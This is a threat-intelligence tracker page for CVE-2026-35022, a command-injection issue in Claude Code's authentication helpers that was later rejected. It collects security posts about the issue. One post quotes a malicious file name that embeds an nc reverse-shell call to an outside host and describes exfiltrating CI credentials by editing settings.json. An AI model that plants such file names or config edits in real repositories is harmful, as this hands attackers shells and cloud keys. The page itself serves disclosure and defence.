CVE-2026-35022Disclosure

LOW

Signal is active with 1 mentions in latest observed window

Immediate actions

  • Patch affected systems immediately

Recommended action window: Monitor and triage in normal cycle

NVD description

Rejected reason: This CVE ID has been rejected by its CVE Numbering Authority (CNA). It was determined that the -p flag behavior is documented in Anthropic's claude -h output with an explicit warning that non-interactive mode should only be used in trusted directories, making this intended and described behavior rather than a vulnerability.

0.5/ 10 priority

Priority

LOW

Exploitation

NONE

PoC

NONE

Patch

AVAILABLE

Momentum

STABLE

Threat summary

  • Patch or workaround signal is available
  • 8 mentions across 4 observed days
  • Momentum state: stable

What's happening

  • Patch or workaround mentioned in 2 signals
  • Technical details provided in 8 signals
  • Disclosure: 6 classified signals
  • Disclosures: 1 classified signal
  • Peaked 3d ago at 4 mentions (2026-04-06); latest day: 1
  • 8 total mentions across 4 days

Deep dive

Activity timeline8 mentions / 4d
01234Mentions · 2026-04-06: 4Mentions · 2026-04-07: 1Mentions · 2026-04-19: 2Mentions · 2026-05-01: 1Patch / Workaround · 2026-04-19: 1Patch / Workaround · 2026-05-01: 1Technical Details · 2026-04-06: 4Technical Details · 2026-04-07: 1Technical Details · 2026-04-19: 2Technical Details · 2026-05-01: 104-0604-0704-1905-01
Signal classification3 categories
Disclosure
675.0%
Disclosures
112.5%
Patch
112.5%
Referenced assets6 URLs
Classification over time
DateTotalLabels
2026-04-064
Disclosure4
2026-04-071
Disclosure1
2026-04-192
Disclosure1Disclosures1
2026-05-011
Patch1
Full discourse8 posts
  • DFIR Lab@DFIR_Lab
    Patch

    🚨 CRITICAL: CVE-2026-35022 (CVSS 9.8) Anthropic Claude Code CLI & Agent SDK vulnerable to OS command injection via authentication helpers. Attackers can execute arbitrary commands, steal credentials. Patch immediately! #CVE #Vulnerability #PatchNow #ThreatIntel https://t.co/pMwh84AbXp

    Post summary

    Anthropic’s Claude Code CLI & Agent SDK are vulnerable to CVE‑2026‑35022, an OS command injection flaw; patches are available and essential to prevent attackers from executing arbitrary commands.

    0001042
    11 followersView on X
  • CrustyTL;DR@CrustyTLDR
    Disclosure

    🤖 Anthropic Claude Code Leak Reveals Critical Command Injection Vulnerabilities A code leak has revealed critical command injection vulnerabilities (CVE-2026-35022) in Anthropic's Claude Code AI... http://crustylabs.ai #AINews #MachineLearning #CrustyTLDR

    Post summary

    A code leak has exposed a critical command‑injection vulnerability (CVE‑2026‑35022) in Anthropic's Claude AI, but no proof of exploitation, patches, or PoC details are provided.

    0001079
    4 followersView on X
  • CVEFind.com@CveFindCom
    Disclosure

    [CVE-2026-35022: CRITICAL] Vulnerability alert: Anthropic Claude Code CLI and Agent SDK are prone to OS command injection. Attackers can exploit this flaw to execute arbitrary commands and steal credentials.#cve,CVE-2026-35022,#cybersecurity https://cvefind.com/CVE-2026-35022

    Post summary

    This post announces a critical OS command injection vulnerability (CVE-2026-35022) in Anthropic Claude Code CLI/Agent SDK that allows arbitrary command execution and credential theft.

    0001089
    619 followersView on X
  • CVE@CVEnew
    Disclosure

    CVE-2026-35022 Anthropic Claude Code CLI and Claude Agent SDK contain an OS command injection vulnerability in authentication helper execution where helper configuration values are … https://www.cve.org/CVERecord?id=CVE-2026-35022

    Post summary

    The post announces CVE-2026-35022, identifying an OS command injection flaw in Anthropic’s Claude Code CLI and Agent SDK, with no evidence of exploitation or remediation discussed.

    00010291
    57.6K followersView on X
  • SecureChap@SecureChap
    Disclosures

    CVE-2026-35022 in Claude Code let a single pull request steal API keys. One of three shell injection flaws disclosed this month in Claude Code 2.1.x. Root cause across all three: Node.js spawn with shell: true and unsanitized string interpolation. CWE-78. CVE-2026-35020 hit at CLI startup. Terminal detection ran sh -c with the TERMINAL env var interpolated in. A .env file or CI runner variable containing $() executed code on load, zero user interaction. CVE-2026-35021 struck during file opens. The editor invocation placed file paths inside double-quoted shell strings. POSIX section 2.2.3: double quotes do not block $() or backticks. A repo file named report`nc -e /bin/sh http://att.com 4444`.md fires on edit. CVE-2026-35022, CVSS 9.8. Authentication helpers in .claude/settings.json - like awsAuthRefresh - ran with full shell interpretation, outside the agent sandbox. Non-interactive mode skipped the trust dialog. A pull request editing settings.json exfiltrated AWS, GCP, and Anthropic API keys straight out of CI. Reported by Phoenix Security's Purple Code Navigator on 2026-03-31 after an accidental source code leak. Anthropic acknowledged the next day. Fix pattern: argv-based spawn, never exec with a shell string. Review .claude/settings.json diffs the way you review Dockerfile diffs. When your agent has your cloud credentials and reads files from random repos, a filename becomes an exploit.

    Post summary

    The post discloses multiple shell‑injection vulnerabilities in Claude Code 2.1.x, provides technical details and CVSS scores, and suggests remediation steps, but does not present a PoC, active exploitation evidence, or a false‑positive claim.

    0000054
    6 followersView on X
  • CCB Alert@CCBalert
    Disclosure

    Warning: CVE-2026-35022 (CVSS 9.8) in Anthropic Claude Code CLI & Agent SDK allows OS command injection, enabling attackers to execute arbitrary commands and steal sensitive data. More info at: https://www.cve.org/CVERecord?id=CVE-2026-35022 #patch #patch #patch

    Post summary

    A warning that CVE-2026-35022, a high‑severity OS command injection flaw in Anthropic Claude Code CLI & Agent SDK, can allow arbitrary command execution and data theft. No PoC, exploit code, or patch details are provided.

    00000318
    7.2K followersView on X
  • Infoflowcloud@infoflowcloud
    Disclosure

    🚨*CVE* CVE-2026-35022 Anthropic Claude Code CLI and Claude Agent SDK contain an OS command injection vulnerability in authentication helper execution where helper configuration values are … https://www.cve.org/CVERecord?id=CVE-2026-35022 ----- Traducción: CVE-2026-35022 Ant… http://infoflow.cloud`

    Post summary

    A new OS command injection vulnerability (CVE‑2026‑35022) affecting Anthropic Claude CLI and SDK has been disclosed with a link to the official CVE record.

    0000062
    67 followersView on X
  • 0day Signal@0dayPublishing
    Disclosure

    🚨 CVE-2026-35022: Anthropic Claude Code & Agent SD... Shell=true strikes again - Anthropic's auth helpers execute user input directly, turning CI/CD pipelines into credentia... https://zerodaysignal.com/vulnerability/CVE-2026-35022 #netsec #vulnerability #CVE #sysadmin #zeroday

    Post summary

    The tweet announces a new CVE-2026-35022 affecting Anthropic Claude’s auth helpers, where user input is executed directly, potentially compromising CI/CD pipelines. No PoC, patch, or exploitation evidence is provided.

    0000095
    204 followersView on X

Explore more